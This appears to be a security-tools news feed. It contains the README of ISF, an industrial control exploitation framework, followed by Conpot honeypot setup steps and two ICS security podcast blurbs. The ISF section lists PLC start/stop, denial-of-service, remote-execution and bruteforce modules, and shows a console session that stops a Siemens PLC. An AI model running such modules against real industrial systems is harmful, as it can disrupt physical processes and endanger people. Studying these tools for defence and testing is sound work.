ISF – Industrial Control System Exploitation Framework

ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it’s similar to metasploit framework.ISF is based on open source project routersploit.Read this in other languages: English, 简体中文,ICS Protocol Clients Name Path Description modbus_tcp_client icssploit/clients/modbus_tcp_client.py Modbus-TCP Client wdb2_client icssploit/clients/wdb2_client.py WdbRPC Version 2 Client(Vxworks 6.x) s7_client icssploit/clients/s7_client.py s7comm Client(S7 300/400 PLC) Exploit Module Name Path Description s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control.py S7-300/400 PLC start/stop s7_1200_plc_control exploits/plcs/siemens/s7_1200_plc_control.py S7-1200 PLC start/stop/reset vxworks_rpc_dos exploits/plcs/vxworks/vxworks_rpc_dos.py Vxworks RPC remote dos(CVE-2015-7599) quantum_140_plc_control exploits/plcs/schneider/quantum_140_plc_control.py Schneider Quantum 140 series PLC start/stop crash_qnx_inetd_tcp_service exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py QNX Inetd TCP service dos qconn_remote_exec exploits/plcs/qnx/qconn_remote_exec.py QNX qconn remote code execution profinet_set_ip exploits/plcs/siemens/profinet_set_ip.py Profinet DCP device IP config Scanner Module Name Path Description profinet_dcp_scan scanners/profinet_dcp_scan.py Profinet DCP scanner vxworks_6_scan scanners/vxworks_6_scan.py Vxworks 6.x scanner s7comm_scan scanners/s7comm_scan.py S7comm scanner enip_scan scanners/enip_scan.py EthernetIP scanner ICS Protocols Module (Scapy Module)These protocol can used in other Fuzzing framework like Kitty or create your own client. Name Path Description pn_dcp icssploit/protocols/pn_dcp Profinet DCP Protocol modbus_tcp icssploit/protocols/modbus_tcp Modbus TCP Protocol wdbrpc2 icssploit/protocols/wdbrpc2 WDB RPC Version 2 Protocol s7comm icssploit/protocols/s7comm.py S7comm Protocol InstallPython requirementsgnureadline (OSX only)requestsparamikobeautifulsoup4pysnmppython-nmapscapy We suggest install scapy manual with this official documentInstall on Kaligit clone https://github.com/dark-lbp/isf/cd isfpython isf.pyUsage root@kali:~/Desktop/temp/isf# python isf.py _____ _____ _____ _____ _____ _ ____ _____ _______ |_ _/ ____|/ ____/ ____| __ \| | / __ \_ _|__ __| | || | | (___| (___ | |__) | | | | | || | | | | || | \___ \\___ \| ___/| | | | | || | | | _| || |____ ____) |___) | | | |___| |__| || |_ | | |_____\_____|_____/_____/|_| |______\____/_____| |_| ICS Exploitation Framework Note : ICSSPOLIT is fork from routersploit at https://github.com/reverse-shell/routersploit Dev Team : wenzhe zhu(dark-lbp) Version : 0.1.0 Exploits: 2 Scanners: 0 Creds: 13 ICS Exploits: PLC: 2 ICS Switch: 0 Software: 0 isf >Exploitsisf > use exploits/plcs/exploits/plcs/siemens/ exploits/plcs/vxworks/isf > use exploits/plcs/siemens/s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_controlisf > use exploits/plcs/siemens/s7_300_400_plc_controlisf (S7-300/400 PLC Control) >You can use the tab key for completion.OptionsDisplay module options:isf (S7-300/400 PLC Control) > show optionsTarget options: Name Current settings Description —- —————- ———– target Target address e.g. 192.168.1.1 port 102 Target PortModule options: Name Current settings Description —- —————- ———– slot 2 CPU slot number. command 1 Command 0:start plc, 1:stop plc.isf (S7-300/400 PLC Control) >Set optionsisf (S7-300/400 PLC Control) > set target 192.168.70.210[+] {‘target’: ‘192.168.70.210’}Run moduleisf (S7-300/400 PLC Control) > run[*] Running module…[+] Target is alive[*] Sending packet to target[*] Stop plcisf (S7-300/400 PLC Control) >Display information about exploitisf (S7-300/400 PLC Control) > show infoName:S7-300/400 PLC ControlDescription:Use S7comm command to start/stop plc.Devices:- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)Authors:- wenzhe zhu References:isf (S7-300/400 PLC Control) >DocumentsModbus-TCP Client usageWDBRPCV2 Client usageS7comm Client usageSNMP_bruteforce usageS7 300/400 PLC password bruteforce usageVxworks 6.x Scanner usageProfient DCP Scanner usageS7comm PLC Scanner usageProfinet DCP Set ip module usageLoad modules from extra folderHow to write your own moduleDownload ISF

Link: http://feedproxy.google.com/~r/PentestTools/~3/oT_vl-DqvbE/isf-industrial-control-system.html

Conpot – An Open Industrial Control Honeypot

Conpot is an ICS honeypot with the goal to collect intelligence about the motives and methods of adversaries targeting industrial control systemsDocumentationThe build of the documentations source can be found here. There you will also find the instructions on how to install conpot and the FAQ.Easy install using DockerVia a pre-built imageInstall DockerRun docker pull honeynet/conpotRun docker run -it -p 80:80 -p 102:102 -p 502:502 -p 161:161/udp –network=bridge honeynet/conpot:latest /bin/shFinally run conpot -f –template defaultNavigate to http://MY_IP_ADDRESS to confirm the setup.Build docker image from sourceInstall DockerClone this repo with git clone https://github.com/mushorg/conpot.git and cd conpot/dockerRun docker build -t conpot .Run docker run -it -p 80:8800 -p 102:10201 -p 502:5020 -p 161:16100/udp -p 47808:47808/udp -p 623:6230/udp -p 21:2121 -p 69:6969/udp -p 44818:44818 –network=bridge conpotNavigate to http://MY_IP_ADDRESS to confirm the setup.Build from source and run with docker-composeInstall docker-composeClone this repo with git clone https://github.com/mushorg/conpot.git and cd conpot/dockerBuild the image with docker-compose buildTest if everything is running correctly with docker-compose upPermanently run as a daemon with docker-compose up -dSample output::# conpot –template default _ ___ ___ ___ ___ ___| |_ | _| . | | . | . | _| |___|___|_|_| _|___|_| |_| Version 0.6.0 MushMush Foundation 2018-08-09 19:13:15,085 Initializing Virtual File System at ConpotTempFS/__conpot__ootc_k3j. Source specified : tar://conpot-0.6.0-py3.6/conpot/data.tar2018-08-09 19:13:15,100 Please wait while the system copies all specified files2018-08-09 19:13:15,172 Fetched x.x.x.x as external ip.2018-08-09 19:13:15,175 Found and enabled (‘modbus’, ) protocol.2018-08-09 19:13:15,177 Found and enabled (‘s7comm’, <conpot.protocols.s7comm.s7_server.S7Server object at 0x7f1af5ad1f60>) protocol.2018-08-09 19:13:15,178 Found and enabled (‘http’, <conpot.protocols.http.web_server.HTTPServer object at 0x7f1af4fc2630>) protocol.2018-08-09 19:13:15,179 Found and enabled (‘snmp’, <conpot.protocols.snmp.snmp_server.SNMPServer object at 0x7f1af4fc2710>) protocol.2018-08-09 19:13:15,181 Found and enabled (‘bacnet’, <conpot.protocols.bacnet.bacnet_server.BacnetServer object at 0x7f1af4fc22e8>) protocol.2018-08-09 19:13:15,182 Found and enabled (‘ipmi’, <conpot.protocols.ipmi.ipmi_server.IpmiServer object at 0x7f1af5aaa1d0>) protocol.2018-08-09 19:13:15,185 Found and enabled (‘enip’, <conpot.protocols.enip.enip_server.EnipServer object at 0x7f1af5aaa0f0>) protocol.2018-08-09 19:13:15,199 Found and enabled (‘ftp’, <conpot.protocols.ftp.ftp_server.FTPServer object at 0x7f1af4fcec18>) protocol.2018-08-09 19:13:15,206 Found and enabled (‘tftp’, <conpot.protocols.tftp.tftp_server.TftpServer object at 0x7f1af4fcef28$) protocol.2018-08-09 19:13:15,206 No proxy template found. Service will remain unconfigured/stopped. 2018-08-09 19:13:15,206 Modbus server started on: (‘0.0.0.0’, 5020) 2018-08-09 19:13:15,206 S7Comm server started on: (‘0.0.0.0’, 10201) 2018-08-09 19:13:15,207 HTTP server started on: (‘0.0.0.0’, 8800) 2018-08-09 19:13:15,402 SNMP server started on: (‘0.0.0.0’, 16100) 2018-08-09 19:13:15,403 Bacnet server started on: (‘0.0.0.0’, 47808) 2018-08-09 19:13:15,403 IPMI server started on: (‘0.0.0.0’, 6230) 2018-08-09 19:13:15,403 handle server PID [23183] running on (‘0.0.0.0’, 44818) 2018-08-09 19:13:15,404 handle server PID [23183] responding to external done/disable signal in object 1397536723090642018-08-09 19:13:15,404 FTP server started on: (‘0.0.0.0’, 2121) 2018-08-09 19:13:15,404 Starting TFTP server at (‘0.0.0.0’, 6969)Intro videoDownload Conpot

Link: http://feedproxy.google.com/~r/PentestTools/~3/Khos5GRsxrw/conpot-open-industrial-control-honeypot.html

Shodan, Apache, ICS, and Controllers – Paul’s Security Weekly #579

How to use the Shodan search engine to secure an enterprise’s internet presence, Apache access vulnerability could affect thousands of applications, vulnerable controllers could allow attackers to manipulate marine diesel engines, & ICS Security Plagued with Basic, and avoidable mistakes! Paul’s Stories How to use the Shodan search engine to secure an enterprise’s internet presence […]
The post Shodan, Apache, ICS, and Controllers – Paul’s Security Weekly #579 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/6MbmuPLSPnY/

ICS – Enterprise Security Weekly #102

Paul and Matt review the ICS security landscape, discussing the problems and potential solutions to secure critical infrastructure. We used several on-site interviews and briefings with solutions providers at Blackhat as a basis for this segment. Recorded live at the Security Weekly pool cabana in Las Vegas! Visit http://securityweekly.com/esw for all the latest episodes!
The post ICS – Enterprise Security Weekly #102 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/EzvhDy8NcSQ/